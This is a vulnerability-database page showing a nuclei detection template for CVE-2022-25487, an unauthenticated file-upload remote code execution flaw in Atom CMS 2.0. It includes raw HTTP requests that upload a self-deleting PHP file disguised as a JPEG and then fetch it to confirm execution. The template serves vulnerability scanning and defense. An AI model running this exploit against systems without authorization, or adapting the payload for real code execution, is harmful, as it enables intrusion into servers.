Lucene search
K

Atom CMS v2.0 - Remote Code Execution

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Atom CMS v2.0 RCE via /admin/uploads.php. Allows attacker to execute arbitrary code. Fixed in v2.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Atom CMS 2.0 - Remote Code Execution Exploit
30 Mar 202200:00
zdt
ATTACKERKB
CVE-2022-25487
15 Mar 202218:15
attackerkb
Circl
CVE-2022-25487
15 Mar 202221:19
circl
CNNVD
Atom CMS 代码问题漏洞
15 Mar 202200:00
cnnvd
CNVD
Atom CMS Remote Code Execution Vulnerability
17 Mar 202200:00
cnvd
Check Point Advisories
AtomCMS Arbitrary File Upload (CVE-2022-25487)
10 Nov 202200:00
checkpoint_advisories
CVE
CVE-2022-25487
15 Mar 202217:40
cve
Cvelist
CVE-2022-25487
15 Mar 202217:40
cvelist
Exploit DB
Atom CMS 2.0 - Remote Code Execution (RCE)
30 Mar 202200:00
exploitdb
NVD
CVE-2022-25487
15 Mar 202218:15
nvd
Rows per page
id: CVE-2022-25487

info:
  name: Atom CMS v2.0 - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: Fixed in version Atom CMS v2.1
  reference:
    - https://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html
    - https://github.com/thedigicraft/Atom.CMS/issues/256
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25487
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25487
    cwe-id: CWE-434
    epss-score: 0.54766
    epss-percentile: 0.98897
    cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: thedigitalcraft
    product: atomcms
  tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload,vkev,vuln
variables:
  string: "CVE-2022-25487"

http:
  - raw:
      - |
        POST /admin/uploads.php?id=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041

        -----------------------------30623082103363803402542706041
        Content-Disposition: form-data; name="file"


        -----------------------------30623082103363803402542706041
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: image/jpeg


        <?php echo md5("{{string}}");unlink(__FILE__);?>
        -----------------------------30623082103363803402542706041--
      - |
        GET /uploads/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(string)}}'

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - SET avatar = '(.*?)'
        internal: true
# digest: 4a0a0047304502210087f046b3350def186196b143856e4218080b1836c64daafeff62b1506ac76a02022048eeddd94aac9fdf3037c3438a52858bc941abd084920bcc3b6fc71e3b76b4fb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.9High risk
Vulners AI Score7.9
CVSS 27.5
CVSS 3.19.8
EPSS0.54766
21